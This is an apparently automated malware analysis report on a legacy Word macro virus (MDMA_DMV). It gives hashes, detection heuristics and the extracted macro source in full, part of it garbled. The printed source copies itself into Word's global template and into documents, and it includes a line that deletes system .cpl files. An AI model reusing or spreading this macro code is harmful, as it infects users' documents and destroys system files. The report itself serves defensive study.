Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6252e04e71762ed…

MALICIOUS

Office (OLE)

29.5 KB Created: 1980-01-04 20:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d3b62c79599ca60536df0d2cb124fa43 SHA-1: 69837cf8a2fe3244ee31e64f053992a1db56956e SHA-256: f6252e04e71762ed26332f8ac51cf98d363cceb8874f8b9f439c7872a45bd3ea
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy macro virus, specifically the 'RSN MACRO VIRUS' marker and an AutoClose macro. The AutoClose subroutine attempts to install itself and potentially infect other documents, indicating a self-propagation or infection mechanism. The presence of legacy WordBasic macro virus markers and the AutoClose function strongly suggests a malicious intent to spread.

Heuristics 4

  • ClamAV: Doc.Trojan.MDMA-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.MDMA-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "AutoClose"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2962 bytes
SHA-256: a612e4926d5a8adabfb0698354e4a493839759f50b0597791fed0b9e0ffecbbe
Detection
ClamAV: Doc.Trojan.MDMA-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
On Error Resume Next
    install
    If (WordBasic.Day(WordBasic.Now()) = 1) Then
        Select Case get_platform
            Case 1
                WordBasic.Call "infect_mac"
            Case 2
                WordBasic.Call "infect_windows"
            Case 3
                WordBasic.Call "infect_NT"
            Case 4
                WordBasic.Call "infect_95"
        End Select
        show_credits
    End If
End Sub

Private Sub install()
Dim total
Dim installed
Dim i
    On Error Resume Next
    total = WordBasic.CountMacros(0)
    installed = 0
    If total > 0 Then
        For i = 1 To total
            If WordBasic.[MacroName$](i, 0) = "AutoClose" Then
                installed = 1
            End If
        Next
    End If
    If installed = 0 Then
        WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
    Else
        total = WordBasic.CountMacros(1)
        installed = 0
        If total > 0 Then
            For i = 1 To total
                If WordBasic.[MacroName$](i, 1) = "AutoClose" Then
                    installed = 1
                End If
            Next
        End If
        If installed = 0 Then
            WordBasic.FileSaveAs Format:=1
            WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose", 1
        End If
    End If
End Sub

Private Function get_platform()
    On Error Resume Next
    If InStr(WordBasic.[AppInfo$](1), "Macintosh") Then
        get_platform = 1                    'MAC
    End If

    If WordBasic.[AppInfo$](9) <> "0" Then
        get_platform = 2                    'old version of windows
    End If

    If InStr(WordBasic.[GetSystemInfo$](21), "NT") Then
        get_platform = 3                  'Win�������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        , "rk\Logon j ProcessLoginScript j 00 j
    WordBasic.Kill "c:\windows\system\*.cpl"
End If
End Sub

Private Sub show_credits()
    On Error Resume Next
    WordBasic.MsgBox "You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent Modern Anarchists).", "MDMA_DMV", 16
End Sub